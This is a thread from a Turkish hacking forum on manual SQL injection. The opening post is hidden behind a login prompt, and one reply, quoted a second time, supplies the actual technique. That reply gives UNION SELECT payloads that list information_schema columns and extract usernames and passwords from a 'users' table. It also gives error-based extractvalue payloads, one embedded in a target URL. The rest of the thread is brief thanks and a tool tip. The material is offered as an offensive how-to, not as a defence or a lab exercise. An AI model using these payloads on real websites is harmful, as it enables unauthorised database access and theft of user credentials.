Manual SQL İnjection Hacking (1 Viewer)

'SpyRoot · Jun 4, 2022

You must Log In or Register to view the content.

Silinen üye 147804 · Jun 4, 2022

güzel bir union örneği ve anlatımı olmuş, ellerine zihnine sağlık, uzun zamandır en keyif aldığım konu oldu, bir kaç naçizane ekleme yapmak isterim, hatta ne kadar kişi püf noktaları ile alakalı ekleme yapar ve konuya eğilirse o kadar güzel olur.
?id=1 den sonra " çift 2-1 3-2 '2' - '1' deneyerek de sql varlığını sağlama imkanına sahip olabilir.
bir diğer hususta temiz bir veri göstergesi için union çekerken başına, ( -9999999 koyduğu taktirde sonraki gelenleri okuyacak ve temiz bir ekranda tatbik etmemizi sağlayacaktır.)
UNION SELECT 1,2,3,4,5,6,column_name,8,9 FROM information_schema.columns WHERE table_name= 'users'
-9999999 UNION SELECT 1,2,3,4,5,6,uname,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,pass,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,concat(uname':vuk:'),8,9 FROM users

extractvalue helper fonksiyonunda da rand çağırırken
SELECT extractvalue(rand(), concat(1'(SELECT'vuk')));
veri tabanından dönümünü sağlayarak sonuç : XPATH syntax error 'vuk' hatamızı alıp
SELECT extractvalue(rand(), concat(1'(SELECT database())));
x.com/.php?id=extractvalue(rand(), concat(1'(SELECT database())));
sonuç olarak database adını çekebiliriz. error based,

daha fazla manuel sql inj emek konusu açmanı da sabırsızlıkla bekliyorum.

Ygtcn08 · Jun 4, 2022

'SpyRoot said:
You must Log In or Register to view the content.

Lost · Jun 4, 2022

'SpyRoot said:
You must Log In or Register to view the content.

ellerine sağlık başarılı güzel anlatım, kodları yazmakta zorlanan arkadaşlar hackbar cyberfox kullanabilirler daha detaylı...

'SpyRoot · Jun 4, 2022

vuk said:
güzel bir union örneği ve anlatımı olmuş, ellerine zihnine sağlık, uzun zamandır en keyif aldığım konu oldu, bir kaç naçizane ekleme yapmak isterim, hatta ne kadar kişi püf noktaları ile alakalı ekleme yapar ve konuya eğilirse o kadar güzel olur.
?id=1 den sonra " çift 2-1 3-2 '2' - '1' deneyerek de sql varlığını sağlama imkanına sahip olabilir.
bir diğer hususta temiz bir veri göstergesi için union çekerken başına, ( -9999999 koyduğu taktirde sonraki gelenleri okuyacak ve temiz bir ekranda tatbik etmemizi sağlayacaktır.)
UNION SELECT 1,2,3,4,5,6,column_name,8,9 FROM information_schema.columns WHERE table_name= 'users'
-9999999 UNION SELECT 1,2,3,4,5,6,uname,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,pass,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,concat(uname':vuk:'),8,9 FROM users

extractvalue helper fonksiyonunda da rand çağırırken
SELECT extractvalue(rand(), concat(1'(SELECT'vuk')));
veri tabanından dönümünü sağlayarak sonuç : XPATH syntax error 'vuk' hatamızı alıp
SELECT extractvalue(rand(), concat(1'(SELECT database())));
x.com/.php?id=extractvalue(rand(), concat(1'(SELECT database())));
sonuç olarak database adını çekebiliriz. error based,

daha fazla manuel sql inj emek konusu açmanı da sabırsızlıkla bekliyorum.

Teşekkürler hocam, bu tarz konuları açmayı düşünüyorum daha fazla.

'SpyRoot · Jun 4, 2022

Lost said:
ellerine sağlık başarılı güzel anlatım, kodları yazmakta zorlanan arkadaşlar hackbar cyberfox kullanabilirler daha detaylı...

Eyvallah Kardeşim

Su3yN1D · Jun 6, 2022

Mastarfox · Aug 14, 2022

'SpyRoot said:
You must Log In or Register to view the content.

crash-d4rk-h4cker · Aug 14, 2022

ellerine sağlık

-London · May 8, 2023

'SpyRoot said:
You must Log In or Register to view the content.

eyw

Cyny · May 10, 2023

'SpyRoot said:
You must Log In or Register to view the content.

sd

teso · May 13, 2023

Manual SQL İnjection Hacking (1 Viewer)

More options

'SpyRoot

Silinen üye 147804

Ygtcn08

Lost

Yaşayan Forum Efsanesi

'SpyRoot

'SpyRoot

Su3yN1D

Mastarfox

crash-d4rk-h4cker

-London

Cyny

teso

Users who are viewing this thread